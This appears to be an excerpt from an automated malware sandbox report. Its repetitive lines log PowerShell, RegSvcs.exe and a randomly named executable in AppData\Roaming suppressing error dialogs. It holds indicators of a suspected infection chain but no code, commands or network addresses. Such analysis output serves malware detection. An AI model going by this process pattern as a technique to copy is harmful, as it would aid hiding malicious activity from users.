                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
